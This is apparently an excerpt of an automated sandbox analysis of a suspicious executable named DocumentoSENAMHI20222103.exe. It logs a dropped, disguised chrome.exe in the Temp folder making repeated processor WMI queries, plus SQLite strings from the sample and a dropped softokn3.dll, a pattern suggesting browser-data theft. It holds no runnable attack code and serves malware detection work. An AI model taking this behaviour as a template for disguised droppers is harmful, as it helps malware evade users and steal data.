Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\chrome.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe File created: C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BD14A2 CoCreateInstance, 1_2_00BD14A2
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s;
